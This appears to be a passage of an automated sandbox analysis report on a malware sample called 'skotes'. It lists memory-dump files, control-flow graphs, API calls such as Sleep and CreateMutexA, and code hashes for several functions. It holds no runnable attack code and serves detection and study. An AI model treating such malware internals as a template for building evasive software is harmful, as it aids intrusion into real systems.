                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: b13efa13dd30196b49f19589537867452a825a07e3966d2a8b963166039b469b
                                                                                                                                                                    • Instruction ID: 22f6f31b9784d985d3fb9b6e1affffa0d61fa50c9815ea667a75f397683d0518
                                                                                                                                                                    • Opcode Fuzzy Hash: b13efa13dd30196b49f19589537867452a825a07e3966d2a8b963166039b469b
                                                                                                                                                                    • Instruction Fuzzy Hash: F9213D717562019AE764A7EDA88A7FDB223DF81300F2C091AE44CD73D2CA7649C18267
                                                                                                                                                                    Function 0061A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 283 61a34f-61a35b 284 61a371-61a39a call 62d663 283->284 285 61a35d-61a36b 283->285 291 61a3c8-61a916 call 6280c0 284->291 292 61a39c-61a3a8 284->292 285->284 287 61a93a 285->287 289 61a953-61a994 Sleep CreateMutexA 287->289 290 61a93a call 646c6a 287->290 299 61a9a7-61a9a8 289->299 300 61a996-61a998 289->300 290->289 293 61a3aa-61a3b8 292->293 294 61a3be-61a3c5 call 62d663 292->294 293->287 293->294 294->291 300->299 303 61a99a-61a9a5 300->303 303->299
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNELBASE(00000064), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 1464230837-2857566196
                                                                                                                                                                    • Opcode ID: 0e35d549b437ac66f1839ac92e45ff1b2cb8790e461da1b13474f616f545b220
                                                                                                                                                                    • Instruction ID: d9a1e65b5afaa153c7b47c14c57eecf0b6e95f1c5eaa0ba2ce7182aa30569055
                                                                                                                                                                    • Opcode Fuzzy Hash: 0e35d549b437ac66f1839ac92e45ff1b2cb8790e461da1b13474f616f545b220
                                                                                                                                                                    • Instruction Fuzzy Hash: 122167317122009BEB089BA8EC897EDB723DB95310F28461DE42CD77E5CB7586C08762
                                                                                                                                                                    Function 0064D82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 342 64d82f-64d83a 343 64d83c-64d846 342->343 344 64d848-64d84e 342->344 343->344 345 64d87c-64d887 call 6475f6 343->345 346 64d867-64d878 RtlAllocateHeap 344->346 347 64d850-64d851 344->347 351 64d889-64d88b 345->351 348 64d853-64d85a call 649dc0 346->348 349 64d87a 346->349 347->346 348->345 355 64d85c-64d865 call 648e36 348->355 349->351 355->345 355->346
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0064A813,00000001,00000364,00000006,000000FF,?,0064EE3F,?,00000004,00000000,?,?), ref: 0064D871
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                    • Opcode ID: c2ed8b2c3c305ccfa3839c9fe643f2faa55aa4534311872191c1e92fabb70edc
                                                                                                                                                                    • Instruction ID: cfe3af5aaa182d82b114e7f6bd510e5a9fc0b39ebd0bd087c8a63a18f72b05d3
                                                                                                                                                                    • Opcode Fuzzy Hash: c2ed8b2c3c305ccfa3839c9fe643f2faa55aa4534311872191c1e92fabb70edc
                                                                                                                                                                    • Instruction Fuzzy Hash: ACF0E232E116246EEB613A729C01BBF375BDF95370B188021FC08AB291DA20EC0186E0

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 0064CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217471342.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217494512.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217517089.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217535783.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217555553.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217698261.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217726300.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217758926.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217838870.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217855325.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217870020.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217885416.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217904758.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217921231.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217940900.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217957353.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217985260.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218005496.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218023458.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218044784.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218063307.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218081019.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218100615.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218126040.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218143211.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218195045.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218212854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218231433.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218247857.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218266230.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218283725.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218301395.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218318236.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218334603.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218349887.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218366314.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218391107.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218408668.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218447246.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218470005.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218486844.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218502306.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218518931.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218540352.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2218558347.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                                    • String ID: vd
                                                                                                                                                                    • API String ID: 3213747228-3616272301
                                                                                                                                                                    • Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                                                    • Instruction ID: a460c0b09a48e37c6ee6a9d3c2e6fdbd8bcf807612c28d6bbace3128253b6885
                                                                                                                                                                    • Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                                                    • Instruction Fuzzy Hash: 20B10232D066459FDB55CF28C881BEEBBE7EF45360F1441AAE855EB341D6348D02CBA4
                                                                                                                                                                    Function 00612EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.2217401983.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.2217382213.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.2217401983.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
